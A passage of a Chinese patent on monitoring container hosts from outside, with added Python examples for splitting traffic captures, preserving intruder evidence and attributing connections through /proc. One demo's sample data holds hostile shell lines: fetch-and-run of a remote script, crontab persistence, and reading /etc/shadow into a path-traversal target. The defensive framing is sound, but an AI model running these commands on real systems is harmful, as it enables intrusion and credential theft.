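IP address in each packet's five-tuple.  Classic pcap over Ethernet only."""
import socket
import struct
import sys

PCAP_MAGIC, LINKTYPE_ETHERNET = 0xA1B2C3D4, 1
GLOBAL_HDR = struct.Struct("<IHHiIII")   # magic, major, minor, thiszone, sigfigs, snaplen, linktype
REC_HDR = struct.Struct("<IIII")         # ts_sec, ts_usec, incl_len, orig_len
PROTO_NAMES = {6: "tcp", 17: "udp"}

def five_tuple(frame):
    """(src_ip, src_port, dst_ip, dst_port, proto) of an Ethernet/IPv4 TCP|UDP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":      # not IPv4 (ARP, IPv6, ...)
        return None
    ihl, proto = (frame[14] & 0x0F) * 4, frame[23]
    if proto not in PROTO_NAMES or len(frame) < 14 + ihl + 4:
        return None
    sport, dport = struct.unpack_from("!HH", frame, 14 + ihl)
    return socket.inet_ntoa(frame[26:30]), sport, socket.inet_ntoa(frame[30:34]), dport, PROTO_NAMES[proto]

def read_pcap(data):
    """Parse a little-endian classic pcap blob into (linktype, [(record_header, frame), ...])."""
    magic, _maj, _min, _tz, _sig, _snap, linktype = GLOBAL_HDR.unpack_from(data)
    if magic != PCAP_MAGIC:
        raise ValueError("not a little-endian classic pcap file")
    records, off = [], GLOBAL_HDR.size
    while off + REC_HDR.size <= len(data):
        hdr = data[off:off + REC_HDR.size]
        incl_len = REC_HDR.unpack(hdr)[2]
        off += REC_HDR.size
        records.append((hdr, data[off:off + incl_len]))
        off += incl_len
    return linktype, records

def split_by_host(data, host_ips):
    """Return {virtual_host_ip: pcap_bytes}; a packet lands in every host file whose IP it touches."""
    linktype, records = read_pcap(data)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("this example only decodes Ethernet captures")
    out = {}
    for hdr, frame in records:
        tup = five_tuple(frame)
        if tup is None:
            continue
        for ip in (tup[0], tup[2]):
            if ip in host_ips:
                out.setdefault(ip, bytearray(data[:GLOBAL_HDR.size])).extend(hdr + frame)
    return {ip: bytes(buf) for ip, buf in out.items()}

def build_frame(src, sport, dst, dport, proto=6):
    """Construct a minimal Ethernet/IPv4/TCP-or-UDP frame for the sample capture (checksums left zero)."""
    l4 = struct.pack("!HH", sport, dport) + b"\0" * (16 if proto == 6 else 4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0x4000, 64, proto, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return bytes.fromhex("0242ac110002") + bytes.fromhex("0242ac110001") + b"\x08\x00" + ip + l4

def build_pcap(frames):
    """Wrap constructed frames in a classic pcap container."""
    data = bytearray(GLOBAL_HDR.pack(PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
    for i, frame in enumerate(frames):
        data += REC_HDR.pack(1700000000 + i, 0, len(frame), len(frame)) + frame
    return bytes(data)

# Constructed sample: two virtual hosts (172.17.0.2, 172.17.0.3) behind docker0, plus one ARP frame.
SAMPLE_PCAP = build_pcap([
    build_frame("172.17.0.2", 43210, "203.0.113.10", 80),
    build_frame("203.0.113.10", 80, "172.17.0.2", 43210),
    build_frame("172.17.0.3", 5353, "172.17.0.2", 53, proto=17),
    b"\xff" * 6 + bytes.fromhex("0242ac110003") + b"\x08\x06" + b"\0" * 28,
])

if __name__ == "__main__":
    # usage: split_traffic.py host.pcap 172.17.0.2 172.17.0.3   -> writes 172.17.0.2.pcap, 172.17.0.3.pcap
    with open(sys.argv[1], "rb") as f:
        for ip, blob in split_by_host(f.read(), set(sys.argv[2:])).items():
            with open(f"{ip}.pcap", "wb") as out:
                out.write(blob)
```

A packet exchanged between two virtual hosts is written into both files, so each per-host file is a complete view of that host's traffic. Frames without an IPv4 five-tuple (ARP, IPv6) are dropped here; a deployment would keep them under the source MAC instead, and would prefer pcapng or rotating files for captures of any size.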
S102, monitoring the plurality of virtual hosts based on the related information, and analyzing the events occurring in the plurality of virtual hosts;
the virtual hosts are monitored and analyzed based on the user behaviors, the network connection information, the file events and the traffic;
through user behaviors, network connection information, file events and traffic, the multiple virtual hosts on the host machine can be monitored and analyzed from multiple angles in real time.
The method further comprises analyzing the events occurring in the virtual hosts based on the backup files, including:
acquiring the operation commands of the plurality of virtual hosts;
detecting file download events and file modification events in the host system based on the operation commands;
when a file download event occurs, acquiring and storing the download link in the file download event;
when a file modification event occurs, backing up the modified file in the file modification event, and acquiring the file path information of the modified file;
and analyzing the events occurring in the virtual host based on the download links and the file path information.
Referring to FIG. 2, which illustrates the steps of file backup and analysis:
During file backup and analysis, the operation commands are obtained directly from the multiple virtual hosts on the host machine, and the file modification events and file download events occurring in the virtual hosts are derived from those commands.
Through the operation commands, malicious intrusions occurring in the virtual hosts can be identified: when a malicious file download link, or a file path created or modified by the intruder, is found, the download link is stored in a database, and the malicious file together with the files created or modified by the intruder is saved to a designated directory. Because the files of the virtual hosts are copied for backup from the image read-write layer file directories on the host machine, important files cannot be lost through deletion.
When a malicious file download link is detected during monitoring, the link is synchronized to the database and the malicious file is at once downloaded from that link into the designated directory, so that the sample is preserved even if the intruder later closes the download channel.
When the detected file event is a create, delete or move event, the file path information is saved to the database and the files involved are synchronized in real time from the container's read-write layer on the host machine to the designated directory, so that the intruder cannot destroy them by deletion; the events occurring in the multiple virtual hosts can then be analyzed directly from the backup copies and the saved download links.
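An added example, not the patent's code, of the backup and analysis steps in Python: each recorded operation command is split into its simple commands, download links are pulled out with a URL pattern and stored in an SQLite table, and file paths written by redirections, downloader -o/-O options and a small list of file-writing tools are copied out of the container's read-write layer into a designated backup directory before they can be removed. The layer directory, container name, command records and file contents in run_demo() are constructed; the tool list and path heuristics are illustrative and would be tuned per deployment.

```python
"""Added example: download-link evidence and read-write-layer backups from command records."""
import os
import re
import shlex
import shutil
import sqlite3
import tempfile

URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\"<>]+")
SEP_RE = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")       # split lists/pipelines into simple commands
DOWNLOADERS = {"wget", "curl", "fetch", "aria2c"}
WRITERS = {"mv", "cp", "tee", "chmod", "chown", "touch", "sed", "vi", "vim", "nano"}   # illustrative

def parse_command(cmd):
    """(download_links, modified_paths) for one recorded shell command line (heuristic)."""
    links, paths = URL_RE.findall(cmd), set()
    for piece in SEP_RE.split(cmd):                   # note: also splits inside quotes; fine for triage
        try:
            argv = shlex.split(piece, comments=True)
        except ValueError:                            # unbalanced quotes: keep the links, skip the paths
            continue
        if not argv:
            continue
        for i, tok in enumerate(argv):
            if tok in (">", ">>") and i + 1 < len(argv):
                paths.add(argv[i + 1])                                      # 'echo x > file'
            elif tok.startswith(">") and tok.strip(">"):
                paths.add(tok.lstrip(">"))                                  # 'echo x >file'
            elif tok in ("-O", "-o") and argv[0] in DOWNLOADERS and i + 1 < len(argv):
                paths.add(argv[i + 1])                                      # 'wget url -O file'
        if argv[0] in WRITERS:
            positional = [a for a in argv[1:] if not a.startswith("-")]
            if argv[0] in ("chmod", "chown", "sed"):
                positional = positional[1:]                                 # skip mode / owner / script
            elif argv[0] in ("mv", "cp"):
                positional = positional[-1:]                                # destination only
            paths.update(positional)
    return links, paths

def open_db(path=":memory:"):
    """Evidence database: one table for links, one for backed-up files."""
    db = sqlite3.connect(path)
    db.executescript("CREATE TABLE IF NOT EXISTS download_links(container, url, command);"
                     "CREATE TABLE IF NOT EXISTS modified_files(container, path, backup);")
    return db

def record_evidence(db, container, cmd, upper_dir, backup_root):
    """Store the command's download links; copy its modified files out of the read-write layer."""
    links, paths = parse_command(cmd)
    for url in links:
        db.execute("INSERT INTO download_links VALUES (?, ?, ?)", (container, url, cmd))
    root, backed_up = os.path.realpath(upper_dir), []
    for p in sorted(paths):
        src = os.path.realpath(os.path.join(root, p.lstrip("/")))
        # the path is attacker-chosen: refuse anything that resolves outside the layer ('..' or a
        # symlink planted in the layer pointing at a host file) and anything that is not a regular file
        if not src.startswith(root + os.sep) or not os.path.isfile(src):
            continue                                  # also: unmodified lower-layer files have no copy here
        dst = os.path.join(backup_root, container, os.path.relpath(src, root))
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(src, dst)
        db.execute("INSERT INTO modified_files VALUES (?, ?, ?)", (container, p, dst))
        backed_up.append(p)
    db.commit()
    return links, backed_up

def run_demo():
    """Self-contained run on a constructed read-write layer and constructed command records."""
    root = tempfile.mkdtemp()
    upper = os.path.join(root, "overlay2", "layer-web", "diff")        # hypothetical upper dir of container "web"
    for rel, body in (("tmp/x.sh", "#!/bin/sh\necho pwned\n"), ("etc/crontab", "* * * * * /tmp/x.sh\n")):
        os.makedirs(os.path.dirname(os.path.join(upper, rel)), exist_ok=True)
        with open(os.path.join(upper, rel), "w") as f:
            f.write(body)
    db = open_db()
    commands = [                                                        # constructed command records
        "wget http://203.0.113.7/x.sh -O /tmp/x.sh && chmod +x /tmp/x.sh && /tmp/x.sh",
        "echo '* * * * * /tmp/x.sh' >> /etc/crontab",
        "cat /etc/shadow > ../../../../etc/leak",                       # escape attempt: must be ignored
    ]
    results = [record_evidence(db, "web", c, upper, os.path.join(root, "backup")) for c in commands]
    links = [row[0] for row in db.execute("SELECT url FROM download_links")]
    shutil.rmtree(root)
    return results, links
```

Two limits worth knowing: relative paths in a command are not resolved against the shell's working directory (a host-side audit source that records cwd supplies that), and a path the container only read, never wrote, has no copy in the read-write layer, so nothing is backed up for it, which is the correct outcome. Re-downloading the sample from the stored link, as the description proposes, is best done from an isolated egress rather than from the monitoring host, since the request is visible to the attacker's server.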
In this embodiment, a plurality of virtual hosts are installed on a host machine, and the method locates the information about each virtual host on the host machine, i.e. outside the virtual host, and performs monitoring and analysis on it. Specifically, the network connection information, file events, user behaviors, traffic and backup files related to the plurality of virtual hosts are acquired from outside the plurality of virtual hosts on the host machine; through these the plurality of virtual hosts can be monitored and analyzed, and the monitoring and analysis are carried out on the host machine without entering the virtual hosts to operate; this achieves continuous monitoring of the virtual hosts from outside and analysis of the various events occurring within them.
Example III
Based on the same inventive concept, fig. 3 is a schematic diagram of a network system monitoring and analyzing device, and referring to fig. 3, the monitoring and analyzing device may include: the information acquisition module and the analysis module;
The information acquisition module is used for acquiring related information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host machine, the related information comprising network connection information, file events, user behaviors, traffic and backup files;
and the analysis module is used for monitoring the plurality of virtual hosts based on the related information and analyzing events occurring in the plurality of virtual hosts.
The information acquisition module comprises a user behavior monitoring unit, a network connection unit and a file event capturing unit;
the user behavior monitoring unit is used for capturing all user behaviors on the host machine that are related to the plurality of virtual hosts;
the network connection unit is used for polling the host machine for network connection information related to the plurality of virtual hosts;
and the file event capturing unit captures the file events occurring under the image read-write layer file directories on the host machine that are related to the plurality of virtual hosts.
For the device embodiments, since they are substantially similar to the method embodiments, the description is relatively simple, and reference is made to the description of the method embodiments for relevant points.
Example IV
Based on the same inventive concept, a fourth embodiment of the present application provides an electronic device, including: a memory, a processor, and a computer program stored on the memory and executable on the processor, the computer program implementing the steps of a network system monitoring and analysis method as in any one of the first and second embodiments when executed by the processor.
Example five
Based on the same inventive concept, a fifth embodiment of the present application provides a computer readable storage medium, on which a computer program is stored, which when executed by a processor, implements the steps of a network system monitoring and analyzing method according to any one of the first and second embodiments.
In this specification, each embodiment is described in a progressive manner, and each embodiment is mainly described by differences from other embodiments, and identical and similar parts between the embodiments are all enough to be referred to each other.
It will be apparent to those skilled in the art that embodiments of the present application may be provided as a method, apparatus, or computer program product. Accordingly, embodiments of the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, embodiments of the application may take the form of a computer program product on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, etc.) having computer-usable program code embodied therein.
Embodiments of the present application are described with reference to flowchart illustrations and/or block diagrams of methods, terminal devices (systems), and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing terminal device to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing terminal device, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
While preferred embodiments of the present application have been described, additional variations and modifications in those embodiments may occur to those skilled in the art once they learn of the basic inventive concepts. It is therefore intended that the following claims be interpreted as including the preferred embodiment and all such alterations and modifications as fall within the scope of the embodiments of the application.
Finally, it is further noted that relational terms such as first and second, and the like are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Moreover, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or terminal that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or terminal. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or terminal device that comprises the element.
The principles and embodiments of the present application have been described herein with reference to specific examples, the description of which is intended only to assist in understanding the methods of the present application and the core ideas thereof; meanwhile, as those skilled in the art will have variations in the specific embodiments and application scope in accordance with the ideas of the present application, the present description should not be construed as limiting the present application in view of the above.

Claims (10)

1. A network system monitoring and analyzing method, characterized in that it is applied to a plurality of containerized virtual hosts, the plurality of virtual hosts sharing the kernel of a host machine and being installed on the host machine, the method comprising:
acquiring related information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host machine, the related information comprising network connection information, file events, user behaviors, traffic and backup files, and having a corresponding mapping outside the plurality of virtual hosts on the host machine;
and monitoring the plurality of virtual hosts based on the related information, and analyzing events occurring in the plurality of virtual hosts.
2. The network system monitoring and analyzing method according to claim 1, wherein acquiring the related information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host machine comprises:
capturing all user behaviors on the host machine that are related to the plurality of virtual hosts;
polling the host machine for network connection information related to the plurality of virtual hosts;
and capturing the file events occurring under the image read-write layer file directories on the host machine that are related to the plurality of virtual hosts.
3. The method according to claim 2, wherein capturing all user behaviors on the host machine that are related to the plurality of virtual hosts comprises:
starting a user behavior monitoring program to monitor all user operations on the host machine;
acquiring the output of the user behavior monitoring program, parsing that output, and obtaining operation command records;
acquiring the parent process number in each operation command record, and, based on the parent process number, acquiring the control group information of all processes in the host machine associated with the operation command record;
and, based on the control group information, placing the operation command records in one-to-one correspondence with the plurality of virtual hosts and recording them.
4. The method according to claim 2, wherein polling the host machine for network connection information related to the plurality of virtual hosts comprises:
creating a network connection record table for recording the network connection information in the host machine that is related to the plurality of virtual hosts;
acquiring the process numbers of the processes in the host machine that are related to the plurality of virtual hosts;
periodically acquiring, based on each process number, the network connection information related to that process;
determining whether the network connection information already exists in the network connection record table,
if so, updating the start time and end time of that network connection information in the network connection record table;
if not, adding the network connection information to the network connection record table;
parsing each entry of network connection information in the network connection record table to obtain the corresponding virtual host connection information, the virtual host connection information comprising the virtual host IP, start time, end time, local IP address, local port, external IP, external port, user name, process executable file name and process number;
and expanding the network connection information of the plurality of virtual hosts in the network connection record table based on the virtual host connection information.
5. The network system monitoring and analyzing method according to claim 2, wherein capturing the file events occurring under the image read-write layer file directories on the host machine that are related to the plurality of virtual hosts comprises:
creating a file event monitoring directory, traversing the image layer directories on the host machine, and adding each image layer directory to the file event monitoring directory;
starting a file monitoring program to monitor the file events generated by all files under the file event monitoring directory, the file event types comprising access events, open events, close events, attribute modification events, create events, delete events and move events;
parsing the acquired file event to obtain the file path of the file in the file event;
judging the type of the file event;
if the type of the file event is an access, open, close or attribute-modification event, storing the file event and the file path;
if the type of the file event is a create, delete or move event, updating the file event monitoring directory based on the file event, and storing the file event and the file path;
and attributing the file event to a virtual host according to the image layer directory name in the file path, the image layer directory names being in one-to-one correspondence with the plurality of virtual hosts.
6. The network system monitoring and analyzing method according to claim 1, wherein obtaining the backup files of the plurality of virtual hosts comprises:
copying the files of the plurality of virtual hosts from the image read-write layer file directories on the host machine that are related to the plurality of virtual hosts, to obtain the backup files.
7. The method according to claim 2, wherein analyzing the events occurring in the virtual hosts based on the backup files comprises:
acquiring the operation commands of the plurality of virtual hosts;
detecting file download events and file modification events in the host system based on the operation commands;
when a file download event occurs, acquiring and storing the download link in the file download event;
when a file modification event occurs, backing up the modified file in the file modification event, and acquiring the file path information of the modified file;
and analyzing the events occurring in the virtual hosts based on the download links and the file path information.
8. A network system monitoring and analyzing device, characterized in that the device is applied to a plurality of containerized virtual hosts, the plurality of virtual hosts sharing the kernel of a host machine; the monitoring and analyzing device comprises an information acquisition module and an analysis module;
the information acquisition module is used for acquiring related information of the plurality of virtual hosts from outside the plurality of virtual hosts on the host machine, the related information comprising network connection information, file events, user behaviors, traffic and backup files, and having a corresponding mapping on the host machine;
and the analysis module is used for monitoring the plurality of virtual hosts based on the related information and analyzing events occurring in the plurality of virtual hosts.
9. An electronic device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, the processor implementing a network system monitoring and analysis method according to any one of claims 1 to 7 when the computer program is executed by the processor.
10. A computer readable storage medium, wherein a computer program is stored on the computer readable storage medium, the computer program when executed by a processor implementing a network system monitoring and analysis method according to any one of claims 1 to 7.
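Claims 3 and 4 both rest on the same host-side fact: a container's processes are ordinary host processes whose /proc entries carry the container's cgroup path, and /proc/<pid>/net/tcp is rendered inside that process's network namespace. The Python module below is an added example written for this page, not the patentee's implementation, that shows both claimed procedures on constructed /proc text: the cgroup parser and parent-process fallback of claim 3, and the network connection record table of claim 4 with its start/end time update rule. The cgroup path formats are those written by docker and containerd; the pids, container id, addresses and timestamps in run_demo() are constructed. live_sightings() applies the same parsers to the real /proc and needs root.

```python
"""Added example for claims 3 and 4: attribute host-observed command records and TCP
connections to containers by reading /proc from the host."""
import os
import re
import socket
import struct

# 64-hex container id as docker/containerd write it into the cgroup path:
# v1 "/docker/<id>", v2 "/system.slice/docker-<id>.scope", kubepods "/kubepods/.../<id>"
CGROUP_ID_RE = re.compile(r"(?:^|/|docker-)([0-9a-f]{64})(?:\.scope)?(?:/|$)")
TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "06": "TIME_WAIT", "0A": "LISTEN"}

def container_id_from_cgroup(text):
    """Container id from the contents of /proc/<pid>/cgroup, or None for a host process."""
    for line in text.splitlines():
        m = CGROUP_ID_RE.search(line.split(":", 2)[-1])
        if m:
            return m.group(1)
    return None

def attribute_command(record, cgroup_of):
    """Claim 3: map an operation command record to a container by the cgroup of its process,
    falling back to the parent process (the shell outlives a short-lived command)."""
    for pid in (record["pid"], record["ppid"]):
        cid = cgroup_of(pid)
        if cid:
            return cid
    return None                                      # ran on the host itself

def _addr(hexaddr):
    """'020011AC:0050' -> ('172.17.0.2', 80): /proc/net/tcp stores IPv4 in host byte order."""
    ip, port = hexaddr.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip, 16))), int(port, 16)

def parse_proc_net_tcp(text):
    """Rows of /proc/<pid>/net/tcp; the inode column ties each socket to a process's fd table."""
    rows = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 10:
            continue
        (lip, lport), (rip, rport) = _addr(f[1]), _addr(f[2])
        rows.append({"local_ip": lip, "local_port": lport, "remote_ip": rip, "remote_port": rport,
                     "state": TCP_STATES.get(f[3], f[3]), "uid": int(f[7]), "inode": int(f[9])})
    return rows

class ConnectionTable:
    """Claim 4's record table: one row per (container, pid, local, remote); the start time is
    fixed at first sighting and the end time advances on every poll that still sees the row."""
    def __init__(self):
        self.rows = {}

    def poll(self, now, sightings):
        for s in sightings:
            key = (s["container"], s["pid"], s["local_ip"], s["local_port"], s["remote_ip"], s["remote_port"])
            if key in self.rows:
                self.rows[key]["end"] = now
            else:
                self.rows[key] = dict(s, start=now, end=now)
        return list(self.rows.values())

def live_sightings():
    """Host-side scan (root): for every container pid, the TCP rows whose inode is one of its sockets.
    /proc/<pid>/net/tcp is rendered in that process's network namespace, so the local IP is the
    virtual host's own address even though the reader runs on the host."""
    out = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cgroup") as f:
                cid = container_id_from_cgroup(f.read())
            if not cid:
                continue
            links = (os.readlink(f"/proc/{pid}/fd/{fd}") for fd in os.listdir(f"/proc/{pid}/fd"))
            inodes = {int(l[8:-1]) for l in links if l.startswith("socket:[")}
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/net/tcp") as f:
                rows = parse_proc_net_tcp(f.read())
        except OSError:
            continue                                 # process exited during the scan
        out.extend(dict(r, container=cid, pid=int(pid), exe=exe, user=r["uid"])
                   for r in rows if r["inode"] in inodes)
    return out

def run_demo():
    """Offline run on constructed /proc text: one container pid, two polls, one persistent connection."""
    cid = "4f" * 32                                  # hypothetical container id
    cgroups = {101: f"0::/system.slice/docker-{cid}.scope\n", 100: "0::/init.scope\n"}
    cgroup_of = lambda pid: container_id_from_cgroup(cgroups.get(pid, ""))
    cmd_cid = attribute_command({"pid": 202, "ppid": 101, "argv": ["wget", "http://203.0.113.7/x"]}, cgroup_of)
    net_tcp = ("  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
               "   0: 020011AC:0050 0A00000A:C3A6 01 00000000:00000000 00:00000000 00000000     0        0 123456 1\n")
    rows = parse_proc_net_tcp(net_tcp)
    table = ConnectionTable()
    seen = [dict(rows[0], container=cid, pid=101, exe="/usr/sbin/nginx", user="root")]
    table.poll(1000, seen)
    return cmd_cid, rows, table.poll(1005, seen)
```

Polling is lossy for connections shorter than the poll interval, so the record table only ever holds what a scan happened to catch; a deployment pairs it with the traffic capture or with conntrack or eBPF socket events. The uid column of /proc/net/tcp is reported in the reader's user namespace, so read from the host it is already the host-mapped uid.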
Application CN202210445794.7A (priority date 2022-04-26, filing date 2022-04-26): Network system monitoring analysis method and device, electronic equipment and storage medium. Granted as CN114978963B (en), status Active.

Publications (2)

CN114978963A (en), published 2022-08-30
CN114978963B (en), granted 2024-07-05


Legal Events

Code Title
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant